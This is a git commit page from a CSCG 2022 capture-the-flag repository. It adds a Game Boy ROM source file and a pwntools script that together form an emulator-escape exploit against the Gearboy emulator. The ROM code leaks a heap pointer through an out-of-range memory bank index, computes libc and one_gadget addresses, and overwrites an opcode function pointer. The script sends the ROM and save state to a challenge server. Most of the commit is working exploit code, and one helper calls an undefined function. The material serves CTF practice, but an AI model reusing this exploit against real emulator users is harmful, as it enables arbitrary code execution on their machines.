cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'
git clone https://git.sinitax.com/sinitax/cscg22-gearboy
Log | Files | Refs | sfeed.txt
commit 818a0be94c63c6ddfabe108ca49e2c26922fc130
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 26 May 2022 02:57:04 +0200

Attempt via memory object

Diffstat:

A.gitignore | 2++


AMakefile | 28++++++++++++++++++++++++++++


Amain.c | 31+++++++++++++++++++++++++++++++


Asolve.py | 42++++++++++++++++++++++++++++++++++++++++++


4 files changed, 103 insertions(+), 0 deletions(-)

diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,2 @@
+main.gb
+main.state
diff --git a/Makefile b/Makefile
@@ -0,0 +1,28 @@
+LCC = ./gbdk/build/gbdk/bin/lcc
+SDCC = ./sdcc/bin/sdcc
+GEARBOY = ./gearboy/platforms/linux/gearboy
+
+.PHONY: all clean run
+
+all: main.gb 
+
+clean:
+	rm -f main.gb
+
+$(SDCC):
+	@if [ ! -e Makefile ]; then \
+		cd sdcc && ./configure; \
+	fi
+	make -C sdcc
+
+$(LCC): $(SDCC)
+	SDCCDIR=$(PWD)/sdcc make -C gbdk
+
+main.gb: main.c $(LCC)
+	$(LCC) -o $@ -Wall $< -Wl-yp0x143=0x80
+
+$(GEARBOY):
+	make -C ./gearboy/platforms/linux
+
+run: $(GEARBOY) main.gb
+	$(GEARBOY) main.gb
diff --git a/main.c b/main.c
@@ -0,0 +1,31 @@
+#include "stdint.h"
+
+void
+main(void)
+{
+	volatile static void *memory;
+	volatile static void *processor;
+	volatile static uint64_t op0x00;
+	volatile static uint64_t libc;
+	volatile static uint64_t onegadget;
+	volatile static uint64_t ld_leak;
+
+	/* memory - wrambanks = 0x72840 */
+
+	/* WRAM BANK = -73 */
+	memory = (void*) 0xD7c0;
+
+	/* get leak from heap */
+	ld_leak = *(uint64_t*)(memory + 0x30);
+	libc = ld_leak + 0x127dff0;
+	onegadget = libc + 0xe3afe;
+
+	/* WRAM BANK -13 */
+	*(uint8_t*)(memory + 0x7c) = 0xf3; /* LSB */
+
+	//* ..with new bank, overwrite op 0x00 funcptr */
+	processor = (void*) 0xD960;
+	*(uint64_t*)(processor) = onegadget;
+
+	while (1);
+}
diff --git a/solve.py b/solve.py
@@ -0,0 +1,42 @@
+#!/usr/bin/env python3
+
+from base64 import b64encode
+from sys import argv,exit
+from pwn import *
+
+context.log_level = "error"
+
+def send(rom, state):
+    #io = process("ncat --ssl 8c83260abb62e95abcc3fdf7-gearboy.challenge.master.cscg.live 31337".split())
+    io = process("ncat localhost 1024".split())
+    io.sendline(b64encode(open(rom, "rb").read()))
+    io.sendline(b64encode(open(state, "rb").read()))
+    data = io.readuntil(b"Got EOF")
+    io.close()
+    return data
+
+def set_wrambanks(filename, index):
+    data = open(filename, "rb").read()
+    data = data[:0x1000] + struct.pack("<i", index) + data[0x1004:]
+    with open(filename, "wb+") as f:
+        f.write(data)
+
+def find_heap_start():
+    search_space = (-256, -90)
+    while search_space[0] + 1 != search_space[1]:
+        testval = (search_space[1] + search_space[0]) // 2
+        print(search_space)
+
+        set_modstate(testval)
+
+        data = send("main.gb", "main.state")
+        if b"exit code 139" in data:
+            search_space = (testval, search_space[1])
+        else:
+            search_space = (search_space[0], testval)
+
+    print("OFFSET", testval)
+
+set_wrambanks("main.gb", -0x37)
+
+print(send("main.gb", "main.state").decode())